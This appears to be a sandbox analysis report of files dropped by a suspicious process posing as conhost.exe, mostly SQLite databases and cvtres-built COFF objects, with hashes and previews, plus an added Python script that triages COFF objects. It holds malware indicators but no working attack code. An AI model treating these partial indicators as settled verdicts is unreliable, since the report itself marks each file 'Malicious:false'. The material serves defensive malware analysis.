                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Tue Oct 1 05:21:33 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1924
                                                          Entropy (8bit):4.59920874720824
                                                          Encrypted:false
                                                          SSDEEP:24:HLm9nLzPj694VaHKwKtYN6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:ALzPW94IBK6klmuulB+hnqXSfbNtmhn
                                                          MD5:FB9B8CF190BB815E840559131B741841
                                                          SHA1:C10A6C2E4C9442B3D950590756E0AA6F35AF37E8
                                                          SHA-256:6B45937452D4A51EFD5A4CF7D8E3218A5D4B34F448F6017A06DD00DCF25E8BAB
                                                          SHA-512:A53152115D6D0BC10944A14F1CF032D16151521553ED0FFF5A149946761C85F08EDA8977E3A5D99A0520823D6FA2318E65E7A2524A7C6C1DBAAD2384A6BA58C8
                                                          Malicious:false
                                                          Preview:L.....f.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Y....c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP......................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RESB3CA.tmp.-.<....................a..Microsoft (R) CVTRES.W.=..cwd.C:\blockhostnet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Tue Oct 1 05:21:33 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1948
                                                          Entropy (8bit):4.550615418579209
                                                          Encrypted:false
                                                          SSDEEP:24:HDG9E1XOXMaHowKtYNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:MXJXK6MluOulajfqXSfbNtmhY2Z
                                                          MD5:7EBF6F3CE1CAF34F4ACC3B3C210F8817
                                                          SHA1:D95A81EE60A796A6ECD5C8EF80397CAB9A00B1E0
                                                          SHA-256:22C88F78C1B91787652F6E5EA69BC9157D0123F54AA6AECC92FD9D37D140BBBF
                                                          SHA-512:2529047428C5F5F8698C6B094C78D5A445ED311C3F4DC8F5DD4DE5AC7F10EBB44C257A51E51549B51F3AC61F4B29DC873036E8AA11A362A259E6FAAF32739D94
                                                          Malicious:false
                                                          Preview:L.....f.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........<....c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP..................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RESB531.tmp.-.<....................a..Microsoft (R) CVTRES.W.=..cwd.C:\blockhostnet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.
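The two cvtres.exe entries above are the COFF resource objects that csc.exe has cvtres.exe build during a compile; their File Type line is read from the COFF file header, and the .debug$S previews carry the csc temp object names (one under Edge\Application, one under System32) together with the compiler's working directory, C:\blockhostnet.exe. The following is an added example, not code from the report or from Joe Sandbox, that reproduces those File Type fields from the IMAGE_FILE_HEADER and section table and recovers the path strings from .debug$S. The object bytes are constructed inside the block; the strings placed in its .debug$S are taken from the previews above, and the CodeView records cvtres writes are approximated as NUL-separated strings rather than decoded.

```python
"""COFF object triage: reproduce the report's "File Type" fields from the
IMAGE_FILE_HEADER and section table, then recover the build paths cvtres
records in .debug$S. Added example, not part of the sandbox report; the
object bytes come from build_coff() below, not from the dropped RES*.tmp files."""
import re
import struct
import time

IMAGE_FILE_MACHINE_I386 = 0x014C
FILE_HEADER = struct.Struct("<HHIIIHH")        # 20-byte IMAGE_FILE_HEADER
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")  # 40-byte IMAGE_SECTION_HEADER
PRINTABLE = re.compile(rb"[\x20-\x7e]{3,}")
DRIVE_PATH = re.compile(r"[A-Za-z]:\\")


def parse_coff(data: bytes) -> dict:
    """File header plus each section's name and raw bytes."""
    if len(data) < FILE_HEADER.size:
        raise ValueError("too short for a COFF file header")
    (machine, nsections, timestamp, symtab_off, nsymbols,
     opt_hdr_size, _flags) = FILE_HEADER.unpack_from(data, 0)
    if machine != IMAGE_FILE_MACHINE_I386:
        raise ValueError(f"unexpected machine {machine:#06x}")
    sections, off = [], FILE_HEADER.size + opt_hdr_size
    for _ in range(nsections):
        name, _vs, _va, raw_size, raw_ptr, *_ = SECTION_HEADER.unpack_from(data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "data": data[raw_ptr:raw_ptr + raw_size] if raw_ptr else b""})
        off += SECTION_HEADER.size
    return {"sections": sections, "timestamp": timestamp,
            "created": time.asctime(time.gmtime(timestamp)),
            "symbol_offset": symtab_off, "symbols": nsymbols,
            # "not stripped" in the report means a symbol table is present
            "stripped": symtab_off == 0 or nsymbols == 0}


def summary(obj: dict) -> str:
    """Same field order as the report's File Type line."""
    return (f"Intel 80386 COFF object file, {'stripped' if obj['stripped'] else 'not stripped'}, "
            f"{len(obj['sections'])} sections, symbol offset={obj['symbol_offset']:#x}, "
            f"{obj['symbols']} symbols, created {obj['created']}, "
            f"1st section name \"{obj['sections'][0]['name']}\"")


def debug_tokens(obj: dict) -> list:
    """Printable strings from .debug$S, split at NUL. cvtres stores CodeView
    records there (object name, tool banner, environment block); a few binary
    record-header bytes precede each string, so keep the printable tail of
    every NUL-separated chunk rather than decoding the records."""
    toks = []
    for sec in obj["sections"]:
        if sec["name"] == ".debug$S":
            for chunk in sec["data"].split(b"\0"):
                m = PRINTABLE.search(chunk)
                if m:
                    toks.append(m.group().decode("ascii"))
    return toks


def environment(tokens: list) -> dict:
    """Environment-block pairs: each key string is followed by its value."""
    return {k: tokens[tokens.index(k) + 1]
            for k in ("cwd", "exe", "cmd") if k in tokens and tokens.index(k) + 1 < len(tokens)}


def triage(data: bytes) -> dict:
    obj = parse_coff(data)
    toks = debug_tokens(obj)
    return {"summary": summary(obj), "env": environment(toks),
            "paths": [t for t in toks if DRIVE_PATH.match(t)]}


def build_coff(timestamp: int, debug_payload: bytes, nsymbols: int = 10) -> bytes:
    """Constructed three-section i386 object with the cvtres layout seen above
    (.debug$S, .rsrc$01, .rsrc$02); only .debug$S carries data."""
    names = [b".debug$S", b".rsrc$01", b".rsrc$02"]
    hdr_end = FILE_HEADER.size + SECTION_HEADER.size * len(names)
    out = bytearray(FILE_HEADER.pack(IMAGE_FILE_MACHINE_I386, len(names), timestamp,
                                     hdr_end + len(debug_payload), nsymbols, 0, 0))
    for i, name in enumerate(names):
        size, ptr = (len(debug_payload), hdr_end) if i == 0 else (0, 0)
        # 0x42100040: initialised data, discardable, readable (as in the previews)
        out += SECTION_HEADER.pack(name, 0, 0, size, ptr, 0, 0, 0, 0, 0x42100040)
    out += debug_payload
    out += b"\0" * (18 * nsymbols)              # placeholder symbol table, 18 bytes each
    out += struct.pack("<I", 4)                 # empty string table (holds its own length)
    return bytes(out)


# Constructed stand-in for the strings the previews show: the csc temp object
# name, the CVTRES banner and the environment block with cwd and exe.
SAMPLE_DEBUG = (
    b"\x04\x00\x00\x00"                         # CV_SIGNATURE_C13
    + b"c:\\Program Files (x86)\\Microsoft\\Edge\\Application\\CSC35F53CF7FFB422D917B12E88668AC1.TMP\0"
    + b"Microsoft (R) CVTRES\0"
    + b"cwd\0C:\\blockhostnet.exe\0"
    + b"exe\0C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\0"
)
SAMPLE_OBJ = build_coff(1727760093, SAMPLE_DEBUG)  # 2024-10-01 05:21:33 UTC

if __name__ == "__main__":
    for key, value in triage(SAMPLE_OBJ).items():
        print(key, value)
```

On a real RES*.tmp the same triage() call gives the csc temp path and cwd directly; a compile whose object name sits under Program Files or System32, or whose cwd is a directory named like an executable, is worth pulling the surrounding process tree for. The timestamp is the COFF TimeDateStamp printed as UTC, which is where the "created" value in the File Type line comes from.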
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
